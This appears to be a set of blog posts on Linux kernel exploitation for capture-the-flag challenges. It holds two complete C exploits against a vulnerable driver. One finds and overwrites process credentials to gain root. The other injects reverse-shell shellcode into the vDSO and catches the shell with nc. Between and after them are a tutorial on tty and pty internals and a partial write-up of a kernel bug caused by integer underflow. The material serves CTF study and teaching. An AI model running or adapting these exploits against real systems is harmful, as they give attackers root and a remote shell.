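The window is 64 TiB, i.e. 2^34 pages, so the scan is only practical because the guest has little RAM (512 MB in the qemu command above) and the target is normally found early in the range.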

The complete exp:

#define _GNU_SOURCE /* needed for the memmem declaration */
#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
#include<sys/types.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <string.h>
#include <stdbool.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;
    
    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);

    return;
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
    uint32_t i;
    for (i=0; i<len; i++){
        seek_channel.id = channel_id;
        seek_channel.index = addr-0x10+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        write_channel.id = channel_id;
        write_channel.buf = (char*)write_buff+i;
        write_channel.count = 1;
        ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);
    }
    return;
}

int main()
{
    char name[20];
    struct alloc_channel_args channel_alloc;
    struct shrink_channel_args channel_shrink;
    int channel_id;
    char * read_buff = NULL;
    char * target = NULL;
    size_t cred_addr = -1;
    size_t real_cred_addr = 0;
    char root_cred[28] = {0};

    int fd = open("/dev/csaw",O_RDWR);
    if(fd < 0){
        die("open error");
    }

    read_buff = (char*)malloc(0x1000);
    strcpy(name,"try2findmesauce");
    prctl(PR_SET_NAME,name);

    channel_alloc.buf_size = 0x100;
    channel_alloc.id = -1;
    ioctl(fd,CSAW_ALLOC_CHANNEL,&channel_alloc);
    if(channel_alloc.id == -1){
        die("alloc channel wrong");
    }
    else{
        printf("alloc channel id is :%d\n",channel_alloc.id);
    }

    channel_id = channel_alloc.id;
    channel_shrink.id = channel_id;
    channel_shrink.size = 0x101;
    ioctl(fd,CSAW_SHRINK_CHANNEL,&channel_shrink);

    for(size_t addr = 0xffff880000000000;addr < 0xffffc80000000000;addr+=0x1000){
        RAA(fd,channel_id,read_buff,addr,0x1000);
        target = memmem(read_buff,0x1000,name,16);
        if(target != NULL){
            cred_addr = *(size_t *)(target - 0x8);
            real_cred_addr =  *(size_t *)(target - 0x10);
            if(cred_addr == real_cred_addr){
                printf("found cred at 0x%lx\n",addr+(size_t)(target-read_buff));
                printf("cred at 0x%lx\n",cred_addr);
                break;
            }
        }
    }

    if(cred_addr == -1){
        die("not find cred");
    }

    WAA(fd,channel_id,root_cred,cred_addr,28);
    if(getuid() == 0){
        printf("win~~~\n");
        system("/bin/sh");
    }else{
        die("fail");
    }
}

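VDSO Attack: (a form of ret2dir)

The vDSO is a mechanism the kernel provides to avoid frequent switches between kernel and user space and so speed up system calls. It supports four calls:

gettimeofday(): returns the time packed in a structure, including seconds, microseconds, and time zone information
time(): returns the current system time as a large integer
getcpu(): returns CPU information
clock_gettime(): reads a clock with nanosecond resolution

The approach is simple: use WAA to overwrite one of the vDSO functions that stand in for system calls with shellcode, then have that function called. Finding the vDSO base address takes the following steps:

With a recent glibc, read the ELF auxiliary vector and compute the offset of the gettimeofday string; the brute-force step that follows uses it to decide whether the vDSO base has been found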

int get_gettimeofday_str_offset() {
    size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
    char* name = "gettimeofday";
    if (!vdso_addr){
        printf("error get name's offset");
        return 0;
    }
    else{
        printf("vdso_addr in user: 0x%lx\n",vdso_addr);
    }
    /* memmem returns a pointer, or NULL when the string is not found */
    char *name_addr = memmem((void *)vdso_addr, 0x1000, name, strlen(name));
    if (name_addr == NULL) {
        printf("error get name's offset");
        return 0;
    }

    return name_addr - (char *)vdso_addr;
}

Brute-force the vDSO address: the vDSO is page-aligned, and what is mapped there is an ELF file

int offset = get_gettimeofday_str_offset();
for (uint64_t addr = 0xffff880000000000; addr<0xffffc80000000000; addr+=0x1000) {
    RAA(fd,channel_id,read_buff,addr,0x1000);
    if (!strcmp(read_buff+offset,"gettimeofday")) {
        fprintf(stderr,"0x%lx found it?\n", (unsigned long)addr);
        vdso_addr = addr;
        break;
    }
}
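Since the mapped object is an ELF file, the string comparison at a fixed offset could be paired with a check of the ELF magic at the start of the page to reduce false positives. The following is a sketch of such a combined test on one page read through RAA; has_elf_magic and page_is_vdso are hypothetical helpers, not part of the original exp.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if the buffer starts with the 4-byte ELF magic. */
static int has_elf_magic(const void *page)
{
    static const unsigned char magic[4] = { 0x7f, 'E', 'L', 'F' };

    return memcmp(page, magic, sizeof(magic)) == 0;
}

/*
 * Returns 1 if the page starts with the ELF magic and holds the
 * NUL-terminated string "gettimeofday" at str_offset.
 */
static int page_is_vdso(const char *page, size_t page_len, size_t str_offset)
{
    static const char name[] = "gettimeofday";

    if (str_offset + sizeof(name) > page_len)
        return 0;   /* the string would run past the end of the page */
    return has_elf_magic(page) &&
           memcmp(page + str_offset, name, sizeof(name)) == 0;
}
```

Here str_offset would be the value returned by get_gettimeofday_str_offset, and page the buffer filled by RAA for the candidate address.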

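PS: the vDSO can be hijacked because it is writable from kernel mode; on newer kernels it is no longer writable

Once the kernel address of the vDSO has been brute-forced, dump the vDSO with GDB and load it into IDA to find the offset of the gettimeofday function (get_gettimeofday_str_offset finds the offset of the gettimeofday string, not of the function)

vdso_addr in kernel: 0xffff880001e04000

pwndbg> dump memory ./vdso.so 0xffff880001e04000 0xffff880001e05000

The shellcode written is a reverse shell: it connects a root shell back to local port 3333, so we only need to listen on local port 3333 with nc

If a program running as root calls our shellcode, the shellcode also runs as root
On Linux, crontab runs with root privileges and keeps calling the vDSO gettimeofday function
Under qemu, a program is used to simulate this (in this challenge, /sbin/init)

The complete exp: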

#define _GNU_SOURCE /* needed for the memmem declaration */
#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
#include<sys/types.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <string.h>
#include <stdbool.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

int get_gettimeofday_str_offset() {
    size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
    char* name = "gettimeofday";
    if (!vdso_addr){
        printf("error get name's offset");
        return 0;
    }
    else{
        printf("vdso_addr in user: 0x%lx\n",vdso_addr);
    }
    /* memmem returns a pointer, or NULL when the string is not found */
    char *name_addr = memmem((void *)vdso_addr, 0x1000, name, strlen(name));
    if (name_addr == NULL) {
        printf("error get name's offset");
        return 0;
    }

    return name_addr - (char *)vdso_addr;
}

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;
    
    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);

    return;
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
    uint32_t i;
    for (i=0; i<len; i++){
        seek_channel.id = channel_id;
        seek_channel.index = addr-0x10+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        write_channel.id = channel_id;
        write_channel.buf = (char*)write_buff+i;
        write_channel.count = 1;
        ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);
    }
    return;
}

int main()
{
    char name[20];
    struct alloc_channel_args channel_alloc;
    struct shrink_channel_args channel_shrink;
    int channel_id;
    char * read_buff = NULL;
    size_t vdso_addr = -1;
    char shellcode[]="\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb\x48\x39\xc3\x75\x0f\x48\x31\xc0\xb0\x39\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x09\x5b\x48\x31\xc0\xb0\x60\x0f\x05\xc3\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x97\x50\x48\xb9\xfd\xff\xf2\xfa\x80\xff\xff\xfe\x48\xf7\xd1\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x07\x48\x31\xc0\xb0\xe7\x0f\x05\x90\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd3\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0\xb0\xe7\x0f\x05";

    int fd = open("/dev/csaw",O_RDWR);
    if(fd < 0){
        die("open error");
    }

    read_buff = (char*)malloc(0x1000);

    channel_alloc.buf_size = 0x100;
    channel_alloc.id = -1;
    ioctl(fd,CSAW_ALLOC_CHANNEL,&channel_alloc);
    if(channel_alloc.id == -1){
        die("alloc channel wrong");
    }
    else{
        printf("alloc channel id is :%d\n",channel_alloc.id);
    }

    channel_id = channel_alloc.id;
    channel_shrink.id = 1;
    channel_shrink.size = 0x101;
    ioctl(fd,CSAW_SHRINK_CHANNEL,&channel_shrink);

    int offset = get_gettimeofday_str_offset();
    printf("%x\n",offset);
    for (uint64_t addr = 0xffff880000000000; addr<0xffffc80000000000; addr+=0x1000) {
        RAA(fd,channel_id,read_buff,addr,0x1000);
        if (!strcmp(read_buff+offset,"gettimeofday")) {
            fprintf(stderr,"%p found it?\n", (void*)addr);
            vdso_addr = addr;
            break;
        }
    }

    if(vdso_addr == -1){
        die("not find vdso");
    }
    else{
        printf("vdso_addr in kernel: 0x%lx\n",vdso_addr);
    }

    size_t gettimeofday = vdso_addr + 0xcb0;
    WAA(fd,channel_id,shellcode,gettimeofday,strlen(shellcode));

    sleep(1);
    printf("open a shell\n");
    system("nc -lvnp 3333");
}

Summary:

I tried out both the “cred attack” and the “vdso attack”

I had originally wanted to try “HijackPrctl” as well, but I have already reproduced it in qwb2018-solid_core

A Brief Analysis of Linux tty

Posted on 2022-10-07 In Knowledge 7.5k 7 mins.

tty_struct attack

When a user opens the ptmx driver with open("/dev/ptmx", O_RDWR), the kernel allocates a tty_struct, which is defined as follows:

struct tty_struct {
	int	magic;
	struct kref kref;
	struct device *dev;
	struct tty_driver *driver;
	const struct tty_operations *ops;
	int index;

	/* Protects ldisc changes: Lock tty not pty */
	struct ld_semaphore ldisc_sem;
	struct tty_ldisc *ldisc;

	struct mutex atomic_write_lock;
	struct mutex legacy_mutex;
	struct mutex throttle_mutex;
	struct rw_semaphore termios_rwsem;
	struct mutex winsize_mutex;
	spinlock_t ctrl_lock;
	spinlock_t flow_lock;
	/* Termios values are protected by the termios rwsem */
	struct ktermios termios, termios_locked;
	struct termiox *termiox;	/* May be NULL for unsupported */
	char name[64];
	struct pid *pgrp;		/* Protected by ctrl lock */
	struct pid *session;
	unsigned long flags;
	int count;
	struct winsize winsize;		/* winsize_mutex */
	unsigned long stopped:1,	/* flow_lock */
		      flow_stopped:1,
		      unused:BITS_PER_LONG - 2;
	int hw_stopped;
	unsigned long ctrl_status:8,	/* ctrl_lock */
		      packet:1,
		      unused_ctrl:BITS_PER_LONG - 9;
	unsigned int receive_room;	/* Bytes free for queue */
	int flow_change;

	struct tty_struct *link;
	struct fasync_struct *fasync;
	wait_queue_head_t write_wait;
	wait_queue_head_t read_wait;
	struct work_struct hangup_work;
	void *disc_data;
	void *driver_data;
	spinlock_t files_lock;		/* protects tty_files list */
	struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

	int closing;
	unsigned char *write_buf;
	int write_cnt;
	/* If the tty has a pending do_SAK, queue it here - akpm */
	struct work_struct SAK_work;
	struct tty_port *port;
} __randomize_layout;

It contains a pointer to a struct tty_operations, and the tty_operations structure holds a series of function pointers for operating on the driver:

struct tty_operations {
	struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	int  (*write_room)(struct tty_struct *tty);
	int  (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
	long (*compat_ioctl)(struct tty_struct *tty,
			     unsigned int cmd, unsigned long arg);
	void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
	void (*throttle)(struct tty_struct * tty);
	void (*unthrottle)(struct tty_struct * tty);
	void (*stop)(struct tty_struct *tty);
	void (*start)(struct tty_struct *tty);
	void (*hangup)(struct tty_struct *tty);
	int (*break_ctl)(struct tty_struct *tty, int state);
	void (*flush_buffer)(struct tty_struct *tty);
	void (*set_ldisc)(struct tty_struct *tty);
	void (*wait_until_sent)(struct tty_struct *tty, int timeout);
	void (*send_xchar)(struct tty_struct *tty, char ch);
	int (*tiocmget)(struct tty_struct *tty);
	int (*tiocmset)(struct tty_struct *tty,
			unsigned int set, unsigned int clear);
	int (*resize)(struct tty_struct *tty, struct winsize *ws);
	int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
	int (*get_icount)(struct tty_struct *tty,
				struct serial_icounter_struct *icount);
	int  (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
	int  (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
	void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
	int (*poll_init)(struct tty_driver *driver, int line, char *options);
	int (*poll_get_char)(struct tty_driver *driver, int line);
	void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
	int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;

The tty_struct structure is 0x2E0 bytes in size. In kernel pwn, if we can obtain an object from kmalloc-1k, we consider a tty_struct attack (hijacking tty_operations to take control of the execution flow)
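
Why a 0x2E0-byte object ends up in kmalloc-1k can be sketched with a small lookup over the general-purpose cache sizes. This is a user-space illustration only: the size table assumes a typical x86_64 SLUB configuration, and kmalloc_bucket is a made-up helper name, not a kernel function.

```c
#include <stddef.h>

/* General-purpose kmalloc cache sizes on a typical x86_64 SLUB build
 * (an assumption; the exact set depends on the kernel configuration). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the size of the smallest cache that can hold `n` bytes, or 0 if
 * the request is larger than every cache in the table. */
size_t kmalloc_bucket(size_t n)
{
    size_t i;

    for (i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++) {
        if (n <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    }
    return 0;
}
```

With this table, kmalloc_bucket(0x2E0) yields 1024, so a freed 1k object is a candidate slot for a later tty_struct allocation.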

Kernel exploitation is not the focus of this article, though. From here on we look at the role tty itself plays in the kernel

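Terminal emulation

tty is short for “teletypewriter” (a device that was later gradually replaced by keyboards and monitors), and it now refers to a computer's terminal devices in general

In Linux and UNIX, tty has become an abstract device that represents various kinds of terminal devices:
- Sometimes it refers to a physical input device (for example a serial port)
- Sometimes it refers to a “virtual terminal emulation device” that lets the user interact with the system

Modern physical I/O devices are a “keyboard + monitor” combination:

If a user-space program wants to output something to the monitor, it only has to write that content to the tty device that corresponds to the monitor, and the tty layer takes care of matching a suitable driver to complete the output. This is also how the Linux console works:

Physical devices such as the monitor and the keyboard are abstracted as drivers
The Terminal Emulator (virtual terminal) builds a further layer of abstraction on top of the driver interfaces
Characters typed on the keyboard have no inherent meaning; the terminal emulator “formats”, “adapts”, and “interprets” them, and this processing is called the line discipline
Data that has passed through the line discipline is exchanged with user space through the tty, which also carries the output data back
The returned data also passes through the line discipline and is then “translated” into a form the display driver understands before it is output

On Linux you can list the devices of the tty layer directly: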

➜  ~ ls /dev/tty*
/dev/tty    /dev/tty23  /dev/tty39  /dev/tty54      /dev/ttyS10  /dev/ttyS26
/dev/tty0   /dev/tty24  /dev/tty4   /dev/tty55      /dev/ttyS11  /dev/ttyS27
/dev/tty1   /dev/tty25  /dev/tty40  /dev/tty56      /dev/ttyS12  /dev/ttyS28
/dev/tty10  /dev/tty26  /dev/tty41  /dev/tty57      /dev/ttyS13  /dev/ttyS29
/dev/tty11  /dev/tty27  /dev/tty42  /dev/tty58      /dev/ttyS14  /dev/ttyS3
/dev/tty12  /dev/tty28  /dev/tty43  /dev/tty59      /dev/ttyS15  /dev/ttyS30
/dev/tty13  /dev/tty29  /dev/tty44  /dev/tty6       /dev/ttyS16  /dev/ttyS31
/dev/tty14  /dev/tty3   /dev/tty45  /dev/tty60      /dev/ttyS17  /dev/ttyS4
/dev/tty15  /dev/tty30  /dev/tty46  /dev/tty61      /dev/ttyS18  /dev/ttyS5
/dev/tty16  /dev/tty31  /dev/tty47  /dev/tty62      /dev/ttyS19  /dev/ttyS6
/dev/tty17  /dev/tty32  /dev/tty48  /dev/tty63      /dev/ttyS2   /dev/ttyS7
/dev/tty18  /dev/tty33  /dev/tty49  /dev/tty7       /dev/ttyS20  /dev/ttyS8
/dev/tty19  /dev/tty34  /dev/tty5   /dev/tty8       /dev/ttyS21  /dev/ttyS9
/dev/tty2   /dev/tty35  /dev/tty50  /dev/tty9       /dev/ttyS22
/dev/tty20  /dev/tty36  /dev/tty51  /dev/ttyprintk  /dev/ttyS23
/dev/tty21  /dev/tty37  /dev/tty52  /dev/ttyS0      /dev/ttyS24
/dev/tty22  /dev/tty38  /dev/tty53  /dev/ttyS1      /dev/ttyS25

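/dev/tty: (controlling terminal)
- Represents the current tty device
- Running echo hello > /dev/tty in the current terminal displays the text directly in that same terminal
/dev/tty1 ~ /dev/tty6: (virtual terminals)
- Represent software-emulated terminals that run in kernel mode
- These tty devices can be understood as an abstraction over the virtual terminals, so that user programs can interact with a virtual terminal by operating on a file
/dev/tty0: (virtual terminal)
- Represents the currently active virtual terminal
- /dev/tty is defined relative to a process, whereas /dev/tty0 is defined for the whole system (so /dev/tty0 requires higher privileges)
/dev/tty7 ~ /dev/tty63: (other terminals)
- Represent other terminals that run in kernel mode
- These ttys are used by other key software (for example, on Ubuntu /dev/tty7 is the graphical display manager)
/dev/ttyS0 ~ /dev/ttyS31: (serial port terminals)
- Terminal devices connected through the computer's serial ports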

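We can run a small experiment to get a feel for /dev/tty1 ~ /dev/tty6:

First press Ctrl + Alt + F4 in the current session to switch to /dev/tty4

What appears is a virtual terminal (Terminal Emulator), with a user-space shell running on top of it
Press Ctrl + Alt + F2 to switch back to the desktop environment, run sudo echo "hello" > /dev/tty4, and then return to /dev/tty4 (the redirection is performed by the calling shell rather than by sudo, so the current user needs write permission on /dev/tty4)

By operating on the /dev/tty4 file, content produced by a user-space program can be output to the corresponding virtual terminal

tty can be regarded as an abstraction layer over the virtual terminal:

tty gives the user-space shell an abstraction that lets it control all kinds of terminals by operating on files

However, tty runs in kernel mode. To make it easy to move terminal emulation into user space while keeping the tty subsystem intact, the pseudo-terminal was invented (called pseudo-TTY, or pty for short)

Whenever you start a terminal emulator or use any kind of shell on the system, it interacts with a pty
When a pseudo-terminal is created, a device file associated with the pty is created under /dev/pts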

➜  ~ ls -l /dev/pts 
总用量 0
crw--w---- 1 yhellow tty  136, 0 10月  7 20:24 0
crw--w---- 1 yhellow tty  136, 1 10月  7 20:24 1
crw--w---- 1 yhellow tty  136, 2 10月  7 20:41 2
c--------- 1 root    root   5, 2 10月  7 19:14 ptmx

➜  ~ lsof /dev/ptmx
COMMAND    PID    USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
gnome-ter 4015 yhellow   19u   CHR    5,2      0t0   87 /dev/ptmx
gnome-ter 4015 yhellow   20u   CHR    5,2      0t0   87 /dev/ptmx
gnome-ter 4015 yhellow   21u   CHR    5,2      0t0   87 /dev/ptmx

You can type tty in a terminal emulator to find the pty associated with it:

➜  ~ tty
/dev/pts/0

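Pseudo-terminals

A pseudo-terminal (pseudo-tty, or pty for short) is a pair of character devices, the pseudo-terminal master and the pseudo-terminal slave. The slave corresponds to a file under /dev/pts/, while the master is identified in memory only by a file descriptor (fd):

master side - ptm: the end closer to the user's monitor and keyboard (a special file based on VFS)
slave side - pts: the end that CLI (Command Line Interface) programs running on the virtual terminal are attached to

A pseudo-terminal is essentially a pair of character devices created by a terminal emulator that runs in user space:

/dev/ptmx is a character device file. When a process opens /dev/ptmx, it obtains both:
- A file descriptor that refers to a pseudoterminal master (ptm)
- A pseudoterminal slave (pts) device created under /dev/pts
The terminal emulator creates a pseudo-terminal pair and runs the shell on the slave side:
- When the user presses a key in the terminal emulator, the emulator produces a byte stream and writes it to the master, and the shell then reads that input from the slave (as if reading a file)
- The shell and its child programs write their output to the slave, and the terminal emulator reads it from the master and displays it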
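
The master/slave data path can be tried out from a small C function. The following is a minimal, Linux-specific sketch: it opens /dev/ptmx, unlocks the slave and looks up its number with the TIOCSPTLCK and TIOCGPTN ioctls, then writes a line to the master and reads it back from the slave. The function name pty_roundtrip is made up for illustration, and the message should end in a newline because the slave starts in canonical (line-buffered) mode.

```c
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Open a pty pair, write `msg` to the master, and read it back from the
 * slave. Returns the number of bytes read, or -1 on any failure. */
ssize_t pty_roundtrip(const char *msg, char *out, size_t outlen)
{
    int master, slave, unlock = 0;
    unsigned int num;
    char path[32];
    struct pollfd pfd;
    ssize_t n = -1;

    master = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    if (master < 0)
        return -1;
    /* Linux-specific: unlock the slave and ask for its number. */
    if (ioctl(master, TIOCSPTLCK, &unlock) < 0 ||
        ioctl(master, TIOCGPTN, &num) < 0) {
        close(master);
        return -1;
    }
    snprintf(path, sizeof(path), "/dev/pts/%u", num);
    slave = open(path, O_RDWR | O_NOCTTY);
    if (slave < 0) {
        close(master);
        return -1;
    }
    /* "Keyboard" side: bytes written to the master become slave input. */
    if (write(master, msg, strlen(msg)) == (ssize_t)strlen(msg)) {
        pfd.fd = slave;
        pfd.events = POLLIN;
        if (poll(&pfd, 1, 1000) == 1)
            n = read(slave, out, outlen);   /* what a shell would read */
    }
    close(slave);
    close(master);
    return n;
}
```

A terminal emulator does the same thing in a loop: key presses go into the master, and whatever the shell writes to the slave comes back out of the master to be drawn on screen.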

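A pty can be regarded as a lightweight virtual terminal:

It is a Terminal Emulator simulated by software (such as ssh, screen, xterm, and so on)
The terminal you open with a right-click on a Linux desktop is a pty

Uses of pseudo-terminals

Telnet and SSH both use pseudo-terminals (mainly for remote login):

Each time a user connects to the server from a client, the server creates a pseudo-terminal master/slave character device pair
It runs the login program on the slave side and forwards the input and output of the master side to the client over the network
The client then connects what it receives from the network directly to the keyboard and monitor

Network communication still relies on the underlying socket, as with NC (packets are sent over TCP)
The socketFD produced by the socket is redirected to become the “standard input” of the master side (the stdin of the pipe is redirected to socketFD, and the stdout of the pipe is redirected to the master)
The master side and socketFD share one named pipe (a named pipe behaves like two files, one for reading and one for writing, which share the same inode underneath, so the data is shared)
Finally, the stdin, stdout, and stderr of login are redirected to the slave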

HijackPrctl + kernel_base brute force

Posted on 2022-10-05 In Reappearance 13k 12 mins.

Reproducing solid_core

qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd  ./rootfs.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1  kaslr" \
-cpu qemu64,+smep,+smap \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-s \
-nographic  -enable-kvm \

Protections enabled: kaslr, smep, smap

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
echo "flag{hijack_prctl_is_fun_and_function_pointer_is_dangerous}" > /flag
chmod 400 /flag
insmod /simp1e.ko
chmod 777 /proc/simp1e


setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
umount /proc
umount /sys

poweroff -d 0  -f

Also enabled: kptr_restrict, dmesg_restrict

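Vulnerability analysis

Reversing the driver is a bit troublesome, mainly because csaw_ioctl receives a different structure for each of its functions

There are three 8-byte fields; sometimes a field is a pointer, sometimes a size, and sometimes only 4 bytes are passed in

The function csaw_ioctl defines only a single structure, channel_args_from, so I assumed that each position had a fixed purpose and took quite a few wrong turns. In the end I worked out the meaning of each position in channel_args_from from the function names and a few distinctive functions: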

alloc_new_ipc_channel /* contains kmalloc, so the argument passed in must be a size */
realloc_ipc_channel /* the argument passed in is an ID */
get_channel_by_id /* the argument passed in is an ID */
mutex_lock /* the argument passed in is a mutex */

Incidentally, the following two structures appear frequently in the driver module (some entries may differ)

00000000 list struc ; (sizeof=0x28, mappedto_4)
00000000 item dq ?                               ; offset
00000008 mutex dq ?                              ; offset
00000010 field_10 dq ?
00000018 field_18 dq ?
00000020 field_20 dq ?
00000028 list ends

00000000 item struc ; (sizeof=0x20, mappedto_5)
00000000 refcount dd ?
00000004 index dd ?
00000008 buf dq ?                                ; offset
00000010 size dq ?
00000018 data dq ?                               ; offset
00000020 item ends

The vulnerability is in realloc_ipc_channel:

if ( key_cannel )
    size = channel->size + user_size;
else
    size = channel->size - user_size; /* integer underflow */
buf = (char *)krealloc(channel->buf, size + 1, 0x14000C0LL);
if ( buf )
{
    item->buf = buf; 
    item->size = size; /* store the new size in item */
    err = _InterlockedDecrement(&item->refcount);
    key = err == 0;
    if ( err < 0 )
        __asm { ud0 }
    if ( key )
    {
        ipc_channel_destroy(item);
        LODWORD(channel) = 0;
    }
    else
    {
        LODWORD(channel) = 0;
    }
}

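If user_size is greater than channel->size, the subtraction underflows and wraps around
What we want here is not a huge allocation from krealloc; we want the channel->buf allocation to stay as it is while item->size becomes enormous, which bypasses the later check: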

item_write = using_list->item;
size = channel_from.size;
if ( !using_list->item )
    goto LABEL_39;
data_write = item_write->data;
if ( (unsigned __int64)&data_write[channel_from.size] > item_write->size )
    /* item_write->size is huge, which gives a limited arbitrary write */
    goto LABEL_25;
addr = (unsigned __int64)&item_write->buf[(unsigned __int64)data_write];
if ( addr <= 0xFFFFFFFF7FFFFFFFLL )
    /* the driver restricts the range: the target address must be greater than 0xFFFFFFFF7FFFFFFF */
    printk("16Access Denied\n");

else if ( strncpy_from_user(addr, channel_from.user_ptr, channel_from.size) >= 0 )
    /* copy the data at the user pointer user_ptr to addr (item->buf + item->data) */
    goto LABEL_19;

